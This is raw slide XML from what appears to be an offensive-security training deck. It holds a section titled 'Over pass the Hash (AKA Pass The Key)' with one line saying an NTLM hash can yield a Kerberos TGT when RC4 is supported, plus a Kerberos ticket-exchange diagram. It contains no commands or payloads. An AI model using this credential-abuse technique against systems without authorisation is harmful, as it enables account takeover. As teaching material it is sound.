        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2225801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96370-7342-49A2-BFCF-17312CF619A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 7: Over pass the Hash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(AKA Pass The Key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80519B0E-A31F-4025-9BCF-D147BB6EEA3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010005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999F9-1A9C-4FD7-8CCC-5DC877E8F08F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over Pass The Hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76DE9EE6-ABC3-4238-BA27-28DA71F6DFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If RC4 is supported you can use the NTLM Hash to create a Kerberos TGT ticket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2462951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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Kerberos Primer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A5CAAA-C8CF-49CC-9F3F-186E95C82D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="1038537"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B6DC2-1588-4D79-8E5A-C7AA3647ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336294" y="4323724"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E935F3-B697-403A-BCC3-99D65F8EF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8859744" y="4713869"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6548504" y="3037295"/>
            <a:ext cx="758011" cy="873120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECDF310-845F-40AB-87EF-977ACB9DC671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3226530" y="1227401"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56738D1F-B76C-4536-B27B-7C943090F787}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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BDC64F-C78C-4EC8-92F4-0CF83CDD26A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4050062-9873-4FB6-9F2B-AAC6AD8B777E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3377888" y="1639660"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3196913" y="1306285"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B00F27-22F7-4069-9880-E02010ABAB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3196913" y="1306285"/>
              <a:ext cx="5190242" cy="1599172"/>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D762194-1087-4543-A897-7D7E6180AB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4344755" y="1717200"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (receive TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B47BF69-9B1F-44D1-A5DC-74CFCDDD8520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3501511" y="1961012"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3320536" y="1627637"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1E303F-1C33-44AF-B398-A1E42D76C4D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3320536" y="1627637"/>
              <a:ext cx="5271247" cy="1682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A76F2DF-CBB7-4F2C-8024-54C0BC93FD9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="3890252" y="1966409"/>
              <a:ext cx="4642500" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REQ (present TGT, request TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C248EB-F772-48F9-A5EF-1D535A53F2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3652869" y="2373271"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3471894" y="2039896"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EE7E12-93E7-42DF-A80D-E4F326DBA9CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3471894" y="2039896"/>
              <a:ext cx="5190242" cy="1599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C32F8D4-3E06-46E3-A23A-59F7D85C6EAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4611779" y="2400062"/>
              <a:ext cx="3074839" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REP (TGS response)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E23493B-BEBF-4A24-BEF5-F87E5587F20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2398696" y="3758258"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="2398696" y="3758258"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F51800C-3F11-4E7A-AB9E-D1BE443E8827}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipV="1">
              <a:off x="2398696" y="3758258"/>
              <a:ext cx="5271247" cy="1682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FF7D9EA-F682-48C4-8EC6-D6C91D2C0991}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="381265">
              <a:off x="3721427" y="4188518"/>
              <a:ext cx="2663618" cy="373170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (present TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F535996-1243-41AF-B40A-D53B0C1375C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2550054" y="4215121"/>
            <a:ext cx="5319830" cy="1599172"/>
